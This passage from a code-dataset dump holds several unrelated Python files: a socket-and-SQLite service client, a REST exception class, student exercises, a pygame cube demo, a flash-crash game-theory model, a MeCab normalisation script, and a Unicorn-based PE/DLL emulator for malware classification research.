BUFFER_SIZE: # either 0 or end of data\n break\n\n return data\n\ndef format_data(data):\n if len(data) <= 99999 and len(data) > 9999:\n return str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 9999 and len(data) > 999:\n return \"0\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 999 and len(data) > 99:\n return \"00\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 99 and len(data) > 9:\n return \"000\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 9 and len(data) > 0:\n return \"0000\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) == 0:\n return \"00005HOLIS\"\n else:\n return \"00010HOLISERROR\"\n\n#def formatted_message(service: str, msg: str):\n# length = len(service + msg)\n# if len(service) != 5:\n# raise Exception('El largo del nombre del servicio debe ser igual a 5')\n# if len(msg) == 0:\n# raise Exception('Falta el mensaje')\n# if length > 99999:\n# raise Exception('Mensaje excede el largo de 99999 caracteres')\n# left_padding = '0'*(5 - len(f'{length}'))\n# return str.encode(left_padding + str(length) + service + msg)\n\ndef get_product_json(data):\n\tkeys = ['id', 'name', 'country', 'date']\n\tjson_object = []\n\n\tfor elem in data:\n\t\tdic = {}\n\t\tfor item in enumerate(keys):\n\t\t\tdic[item[1]] = elem[item[0]]\n\t\tjson_object.append(dic)\n\n\treturn json.dumps(json_object)\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n s.sendall(b'00010sinitHOLIS')\n data = get_data(s, BUFFER_SIZE)\n print('Received1 ', data.decode('utf-8'))\n\n while True:\n data2 = get_data(s, BUFFER_SIZE)\n print('Received2 ', data2.decode('utf-8'))\n # time.sleep(5)\n\n conn = sqlite3.connect('Project.db')\n c = conn.cursor()\n\n if len(data2) == 10:\n c.execute(\"SELECT * FROM CLIENTS\")\n\n aux1 = get_product_json(c.fetchall())\n aux2 = format_data(aux1)\n conn.commit()\n conn.close()\n \n #aux2 = bytes(aux2, 'utf-8')\n #print(aux2, type(aux2)) \n #print(sys.getsizeof(bytes(aux2, 'utf-8')))\n \n \n if aux2:\n #s.sendall(b'00010HOLISTAMOS')\n s.sendall(bytes(aux2, 'utf-8'))\n \n \n s.close()\n\n\n\n#c.execute('''CREATE TABLE CLIENTS\n# ([generated_id] INTEGER PRIMARY KEY,[Client_Name] text, [Country_ID] 
integer, [Date] date)''')","sub_path":"services/db/Test_Select.py","file_name":"Test_Select.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"394238394","text":"from rest_framework import status\nfrom rest_framework.exceptions import APIException, _get_error_details\n\n\nclass GenericAPIException(APIException):\n status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n default_detail = 'A server error occurred.'\n default_code = 'error'\n\n def __init__(self, status_code=None, detail=None, code=None):\n if status_code is None:\n status_code = self.status_code\n if detail is None:\n detail = self.default_detail\n if code is None:\n code = self.default_code\n\n self.detail = _get_error_details(detail, code)\n self.status_code = status_code\n","sub_path":"api/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"633250484","text":"'''\nPython Programming hw7\n21500426\nSi Hyung You\n2018/04/25\n'''\nimport copy #for using deepcopy later, import copy function\nimport hw7module as m\ncheck=0\n#initialize 'sales' list with ten people, and their sales\nsales=[['김기수',79,34,45,50],['최영호',100,122,89,90],['김영후',34,45,23,67],\n ['홍미수',56,78,42,67],['박수민',118,135,90,99],['이성준',23,33,63,12],\n ['최미영',121,234,213,154],['김홍일',56,45,23,67],['박성민',67,77,45,89],['이수빈',56,50,65,23]]\n\n#first, add all salesman's sales for total sales and append it to each row\nfor i in range(len(sales)):\n totalsale = 0\n for j in range(4):\n totalsale += sales[i][j+1]\n sales[i].append(totalsale)\n print(sales[i])\n\n\nwhile True:\n print('*'*10, 'MENU', '*'*10) #repeat next menus unless user types F or f\n print(\"A. print salesman's sales\")\n print(\"B. specific person's sales\")\n print(\"C. sorting by sales\")\n print(\"D. add new salesman\")\n print(\"E. delete salesman\")\n print(\"F. terminate program\")\n print('*'*10, 'MENU', '*'*10)\n #store user's choice in variable so that program can determine which menu to execute\n choice = input(\"choose the menu: \")\n if choice == 'A' or choice == 'a':\n m.menu_A(sales)\n \n elif choice == 'B' or choice == 'b':\n m.menu_B(sales)\n\n elif choice == 'C' or choice == 'c':\n index = int(input(\"which index for sorting?: (0. name, 1. 1st quarter, 2. 2nd quarter, 3. 3rd quarter, 4. 4th quarter, 5. total sales) \"))\n m.menu_A(m.menu_C(sales, index)) #print sorted function(which differs from the original one) which being returned from menu_C \n\n elif choice == 'D' or choice == 'd':\n m.menu_D(sales)\n \n elif choice == 'E' or choice == 'e':\n index = int(input(\"which index for delete? 
\"))\n m.menu_E(sales, index)\n \n elif choice == 'F' or choice == 'f':\n break\n\n else:\n print(\"choose menu again..\") #if user types menu which is not suggested, tell them to choose again\n\nprint(\"Bye\")\n\n\n","sub_path":"hw7/21500426_hw7_SihyungYou.py","file_name":"21500426_hw7_SihyungYou.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"251057392","text":"#!/usr/bin/python\n# This file only is used to test code\n\n\nfrom capstone import *\n\n# using pefile module to handle PE file and dlls\nimport pefile\n\n# For handling arguments\nimport argparse\n\n# for interate a directory\nimport os\n\n# packing value\nimport struct\n\n# loading constants\nimport constants\n\n# For emulation, we use unicorn engine\nfrom unicorn import *\nfrom unicorn.x86_const import *\n\n\n# for PE class\nimport pe\n\n# Data structure\nimport datastructure\n\n# Now we can handle a dll. What we want to do here is to get dll's content\n# and also the dll's metadata \ndef dll_loader( dllPath, Dll, dllBase, dllNameBase, ldrBase):\n\n\t# Specify dll path\n\tdllName = dllPath.split('/')[1]\n\n\tDll.setName(dllName)\n\n\t# root dir of dlls\n\tDll.setDir(dllPath)\n\n\t# set dll name\n\tDll.setName(dllName)\n\n\t# parse dll\n\ttry:\n\t\tdll = pefile.PE(dllPath)\n\texcept pefile.PEFormatError:\n\t\tpass\n\n\t# Parse data directories\n\tdll.parse_data_directories()\n\n\t# Get dll's contents\n\tdata = str(bytearray(dll.get_memory_mapped_image()))\n\n\t# set content of dll\n\tDll.setData(data)\n\n\t# set DLL base\n\tDll.setDllBase(dllBase)\n\n\t# Set DLL name base\n\tDll.setDllNameBase(dllNameBase)\n\n\t# Set LDR base\t\n\tDll.setLdrBase(ldrBase)\n\n\t# Set dllBase for dll\n\tDll.setSizeOfImage(dll.OPTIONAL_HEADER.SizeOfImage)\n\n\t# Set entrypoint\n\tDll.setEntryPoint(dll.OPTIONAL_HEADER.AddressOfEntryPoint)\n\n\t# set import dll\n\tfor entry in dll.DIRECTORY_ENTRY_EXPORT.symbols:\n\t\tprint(\"entry address 0x%08x \" % (entry.address))\n\t\tprint(\"Dll Base 0x%08x \" % (Dll.getDllBase()))\n\t\tDll.setImpDll(entry.address, entry.name)\n\n\t# display import dll\n\tDll.getImpDll()\n\n\n\t# returns size of dll and base address\n\treturn Dll\n\n\t# Populate ldr instance\n\t#ldr.init_ldr()\n\n\n# Loading dlls into memory\ndef loadDlls(mu, dll):\n\n\t# Write dll content into memory at the address dllBase\n\t# We need the dll content and the address we are going to write\n\t# get DLL's content\n\tprint(\">>> Writing Dll data into memory\")\n\tdllData = dll.getData()\n\t# get DLL's base address\n\tdllBase = dll.getDllBase()\n\tmu.mem_write(dllBase, dllData)\n\n\t# Write dll name into memory ad the address dllNameBase\n\t# We need the dll name and the adress we are going to write\n\t# get DLL's name\n\tprint(\">>> Writing Dll name into memory\")\n\tdllName = dll.getName()\n\n\t# get name base address\n\tdllNameBase = dll.getDllNameBase()\n\tmu.mem_write(dllNameBase, dllName)\n\n\t# Write LDR module to memory\n\t#mu.mem_write(ldrBase, )\n\n\n# Parse input pe\ndef parse_pe(newFile, peobj):\n\n\t# Open PE file\n\tpef = pefile.PE(newFile, fast_load = True)\n\n\t# If the PE file was loaded usign the fast_load=True argument, \n\t# we will need to parse the data directories\n\tpef.parse_data_directories()\n\n\t# Finding entrypoint\n\tpeobj.setEntryPoint(pef.OPTIONAL_HEADER.AddressOfEntryPoint)\n\tprint(\"Entry point: 0x%08x \" % (peobj.getEntryPoint()))\n\n\t# Iterate imports and popluate pe\n\tfor entry in 
pef.DIRECTORY_ENTRY_IMPORT:\n\n\t\tfor imp in entry.imports:\n\n\t\t\t# import name\n\t\t\tpeobj.setImportName(imp.name)\n\n\t\t\t# import address\n\t\t\tpeobj.setImportAddr(imp.address)\n\n\t\t\t# import's library\n\t\t\tpeobj.setImportLib(entry.dll)\n\t\t\t#print(\"%s : 0x%08x: %s\" % (peobj.getImportName(), peobj.getImportAddr(), peobj.getImportLib()))\n\n\t# Iterate sections\n\tfor section in pef.sections:\n\n\t\t# section name\n\t\tpeobj.setSectionName(section.Name)\n\n\t\t# virtual address\n\t\tpeobj.setSectionVirAddr(section.VirtualAddress)\n\n\t\t# virtual size\n\t\tpeobj.setSectionVirSize(section.Misc_VirtualSize)\n\n\t\t# raw size\n\t\tpeobj.setSectionSizeOfRawData(section.SizeOfRawData)\n\n\t\t# Test\n\t\tprint(\"%s : 0x%08x: 0x%08x: 0x%08x\" %(peobj.getSectionName(), peobj.getSectionVirAddr(),\n\t\t\tpeobj.getSectionVirSize(), peobj.getSectionSizeOfRawData()))\n\n\t\t# Look for an entry point in a section\n\t\tif section.contains_rva(peobj.getEntryPoint()):\n\t\t\tprint(\"Section %s contains an entry point\" % (peobj.getSectionName()))\n\n\t\t\t# populate the code section with the matching section\n\t\t\tpeobj.setCodeSection(section)\n\n\t\t\t# set size of text section\n\t\t\tpeobj.setCodeSectionSize(peobj.getSectionSizeOfRawData())\n\n\t\t\tprint(\"Code section size : 0x%08x\" % (peobj.getCodeSectionSize()))\n\n\n\t# Store the memory-mapped image (with the Import Address Table rewritten)\n\tpeobj.setData(bytearray(pef.get_memory_mapped_image()))\n\n\n\n\n\n\n# main function\ndef main():\n\n\t# parse arguments\n\t# Create an ArgumentParser object\n\tparser = argparse.ArgumentParser(prog = \"Malware Classification\", description = 'Searching an export in a DLL')\n\n\t# Add the first argument: a path to the dll\n\tparser.add_argument('-d', dest='dll_path', help='Specify a dll path')\n\n\t# Add the second argument: a desired export\n\tparser.add_argument('-e', dest='export', help='Specify a desired export')\n\n\t# Add the third argument: a desired pe file\n\tparser.add_argument('-f', dest='file', help='Specify a desired pe file')\n\n\t# Let's parse arguments; the arguments are accessed through the args variable\n\targs = parser.parse_args()\n\n\t# Test\n\tpeobj = pe.PE()\n\n\tparse_pe(args.file, peobj)\n\n\t# Create an x86 OS data-structure instance\n\tx86os = datastructure.X86_OS()\n\n\tDlls = []\n\t# Time for unicorn\n\ttry:\n\n\t\t# Initialize an emulator in X86-32bit mode\n\t\tmu = Uc(UC_ARCH_X86, UC_MODE_32)\n\n\t\t# Map 100MB of memory for the emulation\n\t\tmu.mem_map(constants.FS_0, 100 * 1024 * 1024)\n\n\t\t# Initializing the FS segment\n\t\tfss = x86os.init_FS()\n\t\tmu.mem_write(constants.FS_0, fss)\n\n\t\t# FS register\n\t\tmu.reg_write(UC_X86_REG_FS, constants.FS_0)\n\n\t\t# initializing PEB\n\t\tprint(\"Initializing PEB\")\n\t\tmu.mem_write(constants.PEB_ADD, x86os.init_peb())\n\n\t\t# initializing TEB\n\t\tprint(\"Initializing TEB\")\n\t\tmu.mem_write(constants.TEB_ADD, x86os.init_teb())\n\n\t\t# initializing the stack of the emulator\n\t\tmu.reg_write(UC_X86_REG_EBP, constants.STACK_BASE)\n\t\tmu.reg_write(UC_X86_REG_ESP, constants.STACK_BASE)\n\n\t\t# Testing\n\t\tprint(\"PEB\", mu.mem_read(constants.PEB_ADD , len(x86os.init_peb())))\n\t\tprint(\"TEB\", mu.mem_read(constants.TEB_ADD , len(x86os.init_teb())))\n\t\tprint(\"FS\", mu.mem_read(constants.FS_0 , len(x86os.init_FS())))\n\t\tprint(\"FS register: 0x%08x \" % (mu.reg_read(UC_X86_REG_FS)))\n\t\tprint(\"ESP register: 0x%08x \" % (mu.reg_read(UC_X86_REG_ESP)))\n\t\tprint(\"EBP register: 0x%08x \" % (mu.reg_read(UC_X86_REG_EBP)))\n\t\t# Loading dlls\n\t\tprint(\"\\n>>> Loading 
DLLs...\")\n\n\t\t# Iterate over the DLL directory\n\t\tfor subdir, dirs, files in os.walk(args.dll_path):\n\n\t\t\t# We need a base address for dlls\n\t\t\tdllBase = 0x550000\n\n\t\t\t# Base address of DLL name\n\t\t\tdllNameBase = 0x2500\n\n\t\t\t# Base address of LDR module\n\t\t\tldrBase = 0x9000\n\n\t\t\t# Number of Dlls in a directory\n\t\t\tNoOfDlls = 0\n\n\t\t\t# List of ldr addresses, to keep track of the order of the list\n\t\t\tldrList = []\n\n\t\t\t# List of in-memory Dlls\n\t\t\t#dllList = DllList()\n\n\t\t\tdllList = datastructure.DoubleList()\n\n\t\t\t# Iterate over the dlls in the directory\n\t\t\tfor file in files:\n\n\t\t\t\t# Increase number of Dlls by 1\n\t\t\t\tNoOfDlls = NoOfDlls + 1\n\n\t\t\t\t# get the full path of the dll\n\t\t\t\tfullpath = os.path.join(subdir, file)\n\n\t\t\t\t# Create an instance of DLL\n\t\t\t\tdllobj = pe.Dll()\n\n\t\t\t\t# load and populate the current dll\n\t\t\t\tdllobj = dll_loader(fullpath, dllobj, dllBase, dllNameBase, ldrBase)\n\n\t\t\t\t# Writing dll components into memory\n\t\t\t\t# Loading the dll into memory\n\t\t\t\tloadDlls(mu, dllobj)\n\n\t\t\t\tprint(\"Reading %d bytes from [0x%08x]: %s\" % (dllobj.sizeOfDllName(),\n\t\t\t    dllobj.getDllNameBase(), mu.mem_read(dllobj.getDllNameBase(),dllobj.sizeOfDllName())))\n\t\t\t\tprint(\"\\n\")\n\n\t\t\t\t# size of Dll\n\t\t\t\tdllSize = dllobj.sizeOfData()\n\n\t\t\t\t# Store Dll instances into the list\n\t\t\t\tDlls.append(dllobj)\n\n\t\t\t\t# in-memory list\n\t\t\t\t#dllList.add(dll)\n\n\t\t\t\tdllList.append(dllobj)\n\n\t\t\t\t# Update ldrList\n\t\t\t\tldrList.append(ldrBase)\n\n\t\t\t\t# Align memory to load the next dlls\n\t\t\t\tdllBase = dllBase + dllSize\n\n\t\t\t\t# Adjust base address of the DLL name\n\t\t\t\tdllNameBase = dllNameBase + 200\n\n\t\t\t\t# Each LDR module takes 8192 bytes of memory\n\t\t\t\t# This means we increase the base by 0x2000 for each iteration\n\t\t\t\tldrBase = ldrBase + 8192 # 0x2000\n\n\t\t# Print in-memory list\n\t\tdllList.show()\n\n\n\texcept UcError as e:\n\t\tprint(\"ERROR: %s\" % e)\n\t\tmu.emu_stop()\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"83275022","text":"import pygame\nfrom pygame.locals import *\nfrom random import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\n\nANGLE_ROT = 20\nNB_CUBES = 2\nNUM_GENERE = 0\nNO_CUBE = 0\nALEAT = [[(random(),random(),random()) for _ in range(NB_CUBES*3*4*6)] for _ in range(NB_CUBES)]\n\nverticies = (\n    (1, -1, -1),\n    (1, 1, -1),\n    (-1, 1, -1),\n    (-1, -1, -1),\n    (1, -1, 1),\n    (1, 1, 1),\n    (-1, -1, 1),\n    (-1, 1, 1)\n    )\n\nedges = ((0,1),(0,3),(0,4),(2,1),(2,3),(2,7),(6,3),(6,4),(6,7),(5,1),(5,4),(5,7))\nsurfaces = ((0,1,2,3),(3,2,7,6),(6,7,5,4),(4,5,1,0),(1,5,7,2),(4,0,3,6))\n\ndef Cube(verticies=verticies):\n    global NO_CUBE\n    glBegin(GL_QUADS)\n    for surface in surfaces:\n        #x = 0\n        NUM_GENERE = 0\n        for vertex in surface:\n            #x+=1\n            #glColor3fv(colors[randint(0,len(colors)-1)]) # Epileptic cube!\n            #glColor3fv((random(),random(),random()))\n            #print(ALEAT)\n            print(NO_CUBE,NUM_GENERE)\n            glColor3fv(ALEAT[NO_CUBE][NUM_GENERE])\n            NUM_GENERE+=1\n            glVertex3fv(verticies[vertex])\n    glEnd()\n    # wrap around so ALEAT[NO_CUBE] stays in range once Cube() has been called NB_CUBES times\n    NO_CUBE = (NO_CUBE + 1) % NB_CUBES\n    print(NO_CUBE,\"END FUNCTION CUBE\")\n\n    glBegin(GL_LINES)\n    for edge in edges:\n        for vertex in edge:\n            glVertex3fv(verticies[vertex])\n    glEnd()\n\ndef main():\n    pygame.init()\n    display = (800,600)\n    pygame.display.set_mode(display, DOUBLEBUF|OPENGL)\n\n    
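# gluPerspective(fovy, aspect, zNear, zFar): a 45-degree vertical field of view,\n    # the window's aspect ratio, and near/far clipping planes at 0.1 and 50 units;\n    # geometry outside that depth range is clipped away.\n    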
gluPerspective(45, (display[0]/display[1]), 0.1, 50.0)\n\n glTranslatef(0,0, -10)\n\n glRotatef(25, 2, 1, 0)\n\n while True:\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_KP4:\n glTranslatef(-0.5,0,0)\n if event.key == pygame.K_KP6:\n glTranslatef(0.5,0,0)\n if event.key == pygame.K_KP8:\n glTranslatef(0,1,0)\n if event.key == pygame.K_KP2:\n glTranslatef(0,-1,0)\n \n if event.key == pygame.K_PAGEDOWN:\n glRotatef(ANGLE_ROT, 1, 0, 0)\n if event.key == pygame.K_PAGEUP:\n glRotatef(ANGLE_ROT, -1, 0, 0)\n if event.key == pygame.K_UP:\n glRotatef(ANGLE_ROT, 0, 1, 0)\n if event.key == pygame.K_DOWN:\n glRotatef(ANGLE_ROT, 0, -1, 0)\n \n if event.key == pygame.K_RIGHT:\n glRotatef(ANGLE_ROT, 0, 0, 1)\n if event.key == pygame.K_LEFT:\n glRotatef(ANGLE_ROT, 0, 0, -1)\n\n #glRotatef(1, 3, 1, 1)\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n Cube()\n #Cube([list(map(lambda x:x/2,e)) for e in verticies])\n pygame.display.flip()\n #pygame.time.wait(0)\n\nmain()\n","sub_path":"test pls cubes.py","file_name":"test pls cubes.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"279140620","text":"import copy\n\nfrom AssetFundNetwork import AssetFundsNetwork\nimport random\n\nfrom common import copy_network\nfrom constants import ATTACKER, CHANCE, DEFENDER, MARKET, BUY, SELL, SIM_TRADE\nfrom games.bases import GameStateBase\n\n\nclass PlayersHiddenInfo:\n def __init__(self,attacker_attack, attacker_pid, defender_budget):\n self.attacker_attack = attacker_attack\n self.attacker_pid = attacker_pid\n self.defender = defender_budget\n\n def __eq__(self, other):\n return isinstance(other, PlayersHiddenInfo) and self.defender == other.defender and\\\n self.attacker_attack == other.attacker_attack and self.attacker_pid == other.attacker_pid\n\n\nclass PortfolioFlashCrashGameStateBase(GameStateBase):\n\n def __init__(self, parent, to_move, actions, af_network, players_info, actions_history):\n super().__init__(parent=parent, to_move = to_move,actions=actions)\n self.actions_history=actions_history\n self.af_network = af_network\n self.players_info = players_info\n self.children = {}\n\n def inf_set(self):\n return self._information_set\n\n def evaluation(self):\n if not self.is_terminal():\n raise RuntimeError(\"trying to evaluate non-terminal node\")\n\n return -1*self.af_network.count_margin_calls()\n\n\nclass PortfolioFlashCrashRootChanceGameState(GameStateBase):\n def __init__(self, action_mgr, af_network:AssetFundsNetwork, defender_budget):\n self._chance_prob = action_mgr.get_portfolios_prob()\n portfolios = {x: y.order_set for x, y in action_mgr.get_portfolios().items() if x in self._chance_prob}\n super().__init__(parent=None, to_move=CHANCE, actions = portfolios.keys())\n self.af_network = af_network\n self.children = {\n str(p_id): PortfolioAttackerMoveGameState(\n parent=self, actions_manager=action_mgr, to_move=ATTACKER,\n players_info=PlayersHiddenInfo(p, p_id, defender_budget),\n af_network=af_network,\n actions_history={BUY:[],SELL:[],SIM_TRADE:[]}\n ) for p_id, p in portfolios.items()\n }\n\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n\n def is_terminal(self):\n return False\n\n def inf_set(self):\n return \".\"\n\n def chance_prob(self):\n return self._chance_prob\n\n def sample_one(self):\n return random.choice(list(self.children.values()))\n\n\nclass 
PortfolioMarketMoveGameState(PortfolioFlashCrashGameStateBase):\n\n def __init__(self, parent, actions_manager, to_move, players_info, af_network, actions_history):\n self.terminal = af_network.no_more_sell_orders()\n if self.terminal:\n actions = []\n else:\n net2 = copy_network(af_network)\n actions = [str(net2.simulate_trade())]\n\n super().__init__(parent = parent, to_move = to_move, actions=actions,\n af_network = af_network, players_info=players_info, actions_history=actions_history)\n\n self._information_set = \".{0}.{1}.{2}\".format('MARKET_HISTORY:' + str(actions_history[SIM_TRADE])\n ,'BUY:'+str(af_network.buy_orders), 'SELL:'+str(af_network.sell_orders))\n\n if actions:\n action = actions[0]\n actions_history2 = copy.deepcopy(actions_history)\n actions_history2[SELL].append(action)\n actions_history2[BUY].append(action)\n actions_history2[SIM_TRADE].append(action)\n self.children[action] = PortfolioAttackerMoveGameState(\n self,\n actions_manager,\n ATTACKER,\n players_info,\n net2,\n actions_history2\n )\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n\n def chance_prob(self):\n return 1\n\n def is_terminal(self):\n return self.terminal\n\n\nclass PortfolioAttackerMoveGameState(PortfolioFlashCrashGameStateBase):\n def __init__(self, parent, actions_manager, to_move, players_info, af_network, actions_history):\n actions = actions_manager.get_possible_attacks_from_portfolio(players_info.attacker_attack, af_network.no_more_sell_orders())\n self.terminal = not actions\n\n super().__init__(parent=parent, to_move=to_move, actions = [str(x['action_subset']) for x in actions ],\n af_network=af_network, players_info=players_info, actions_history=actions_history)\n\n for action in actions:\n order_set = action['action_subset']\n net2 = copy_network(af_network)\n net2.submit_sell_orders(order_set)\n actions_history2 = copy.deepcopy(actions_history)\n actions_history2[SELL].append(str(order_set))\n self.children[str(order_set)] = PortfolioDefenderMoveGameState(\n self,\n actions_manager,\n DEFENDER,\n PlayersHiddenInfo(action['remaining_orders'], players_info.attacker_pid, players_info.defender),\n net2,\n actions_history2,\n )\n\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n self._information_set = \".{0}.{1}\".format(players_info.attacker_pid, 'A_HISTORY:' + str(actions_history[SELL]))\n\n def is_terminal(self):\n return self.terminal\n\n\nclass PortfolioDefenderMoveGameState(PortfolioFlashCrashGameStateBase):\n\n def __init__(self, parent, actions_manager, to_move, players_info, af_network, actions_history):\n defenses = actions_manager.get_possible_defenses(af_network, players_info.defender)\n str_order_sets = [str(x[0]) for x in defenses]\n super().__init__(parent=parent, to_move=to_move, actions=str_order_sets,\n af_network=af_network, players_info=players_info, actions_history=actions_history)\n\n# if not defenses:\n# self.budget.defender = 0 #in case there is only a small amount of money\n # else:\n for order_set, cost in defenses:\n net2 = copy_network(af_network)\n net2.submit_buy_orders(order_set)\n actions_history2 = copy.deepcopy(actions_history)\n actions_history2[BUY].append(str(order_set))\n self.children[str(order_set)] = PortfolioMarketMoveGameState(\n self,\n actions_manager,\n MARKET,\n PlayersHiddenInfo(players_info.attacker_attack, players_info.attacker_pid, players_info.defender - cost),\n net2,\n actions_history2\n )\n self._information_set = \".{0}.{1}\".format(players_info.defender, 'D_HISTORY:' + 
str(actions_history[BUY]))\n        self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n\n    def is_terminal(self):\n        return False\n\n\n\n\n","sub_path":"games/flash_crash/flash_crash_players_portfolio_cfr.py","file_name":"flash_crash_players_portfolio_cfr.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"474586079","text":"\r\ndef a_sum():\r\n    N = 5 #number of terms\r\n    summen = 0 #the sum of 0 terms\r\n    for i in range(1,N):\r\n        x_i = 1/i**2 #the i-th term\r\n        summen = summen + x_i #the sum including the i-th term\r\n    print(summen)\r\n\r\ndef b_sum():\r\n    tol = 0.00000000000000001 #error tolerance\r\n    x_i = 1 #the zeroth term\r\n    i = 1 #term counter\r\n    summen = 1 #the sum of 1 term\r\n    while x_i - 1/(i+1)**2 > tol:\r\n        x_i = 1/(i+1)**2\r\n        summen = summen + x_i\r\n        i += 1\r\n    print(\"The sum is \",summen,\" and the number of terms is \", i)\r\n\r\na_sum()\r\n\r\nb_sum()\r\n","sub_path":"tdt4110/Øving 3/sum.py","file_name":"sum.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"541878902","text":"import os,sys,imp,time,romkan,copy,re,functools,itertools\nfrom collections import OrderedDict\nfrom collections import defaultdict\n#from mecabtools import mecabtools\n#imp.reload(mecabtools)\nfrom pythonlib_ys import main as myModule\nfrom pythonlib_ys import jp_morph\nimp.reload(myModule)\nHomeDir=os.getenv('HOME')\nmecabtools=imp.load_source('mecabtools',os.path.join(HomeDir,'myProjects/myPythonLibs/mecabtools/mecabtools.py'))\nimport mecabtools\nimp.reload(mecabtools)\nfrom probability import probability\nimp.reload(probability)\n\nDebug=1\n\ndef main0(LexFPs,MecabCorpusFPs,CorpusOnly=False,FreqWdFP=None,UnnormalisableMarkP=True,ProbExemplarFP=None,OutFP=None):\n    LexDir=os.path.dirname(LexFPs[0])\n    RelvFts=('cat','subcat','subcat2','sem','infform','infpat','pronunciation')\n    ProbExemplars=get_exemplars(ProbExemplarFP) if ProbExemplarFP else None\n    Frequents=collect_freq_wds(FreqWdFP,1000) if FreqWdFP else set()\n    OutFPStem='--'.join([os.path.basename(LexFP) for LexFP in LexFPs])\n    HClusters,_=myModule.ask_filenoexist_execute_pickle(OutFPStem+'.pickle',get_clustered_homs,([LexFPs,RelvFts],{'Frequents':Frequents,'ProbExemplars':ProbExemplars,'OutFP':OutFPStem+'.out'}))\n    if Debug:\n        print_clustered_homs(HClusters,OutFP=os.path.join(LexDir,'exemplarless_clusters.txt'))\n    LexFPs=[] if CorpusOnly else LexFPs\n    for MecabFile,CorpusOrDic in [(LexFP,'dic') for LexFP in LexFPs]+[(MecabCorpusFP,'corpus') for MecabCorpusFP in MecabCorpusFPs]:\n        sys.stderr.write('\\n\\nNormalising a '+CorpusOrDic+' '+MecabFile+'\\n')\n        time.sleep(2)\n        FN=os.path.basename(MecabFile)\n        NewFN=myModule.change_stem(FN,'.normed')\n        NewDir=os.path.join(os.path.dirname(MecabFile),'normed')\n        if not os.path.isdir(NewDir):\n            os.makedirs(NewDir)\n        if OutFP:\n            OutFP=OutFP\n        else:\n            OutFP=os.path.join(NewDir,NewFN)\n        normalise_mecabfile(MecabFile,RelvFts,HClusters,OutFP=OutFP,CorpusOrDic=CorpusOrDic,UnnormalisableMarkP=UnnormalisableMarkP)\n\n\ndef print_clustered_homs(ClusteredHs,OutFP=None):\n    Out=open(OutFP,'wt') if OutFP else sys.stdout\n    for ClusteredH in ClusteredHs:\n        if Debug<2 and ClusteredH.exemplar is None:\n            Out.write(ClusteredH.show_summary()+'\\n')\n    if OutFP:\n        Out.close()\n\ndef get_exemplars(ExemplarFP):\n    WdsReprs={}\n    with open(ExemplarFP) as FSr:\n        for LiNe in FSr:\n            if LiNe:\n                KanaRepr=LiNe.strip().split()\n                if 
len(KanaRepr)==2:\n Wd,Repr=KanaRepr[0],KanaRepr[1]\n WdsReprs[Wd]=Repr\n return WdsReprs\n\ndef upto_char(Str,Chars):\n Substr=''\n for Char in Str:\n if Char in Chars:\n break\n else:\n Substr+=Char\n return Substr\n\ndef normalise_mecabfile(FP,RelvFts,ClusteredHs,OutFP=None,RelvFtCnt=7,CorpusOrDic='corpus',KanaOnly=True,UnnormalisableMarkP=True):\n # outfp could be none, true or string\n if not OutFP:\n Out=sys.stdout\n else:\n if OutFP is True:\n TmpOutFP=FP+'.normed.tmp'\n else:\n TmpOutFP=OutFP+'.tmp'\n Out=open(TmpOutFP,'wt')\n\n AlreadyNormedCommonFtsVals=set()\n MSs,Consts=None,myModule.prepare_progressconsts(FP)\n FSr=open(FP)\n ClusteredHDic={tuple(ClusterH.cluster_on):ClusterH for ClusterH in ClusteredHs}\n for Cntr,LiNe in enumerate(FSr):\n if Cntr+1%1000==0:\n MSs=myModule.progress_counter(MSs,Cntr,Consts)\n if not LiNe.strip():\n continue\n if CorpusOrDic=='corpus' and LiNe=='EOS\\n':\n AsItIs=True\n elif KanaOnly and not myModule.all_of_chartypes_p(upto_char(LiNe,[',','\\t']),['hiragana','katakana','roman']):\n AsItIs=True\n else:\n CommonFtsVals=tuple(mecabtools.pick_feats_fromline(LiNe,RelvFts,CorpusOrDic=CorpusOrDic))\n if CorpusOrDic=='corpus' and len(CommonFtsVals)=2:\n sys.stderr.write('\\nnormalised automatically for '+ClusteredH.hiragana_rendering+'\\n')\n ToWrite=NormalisedWd.get_mecabline(CorpusOrDic=CorpusOrDic)+'\\n'\n if CorpusOrDic=='dic':\n AlreadyNormedCommonFtsVals.add(CommonFtsVals)\n else:\n if CorpusOrDic=='corpus' and UnnormalisableMarkP:\n ToWrite='\\nNot automatically normalisable:\\n'+LiNe+'\\n'.join([KanjiWd.orth for KanjiWd in ClusteredH.kanji_tops])+'\\n\\n'\n else:\n 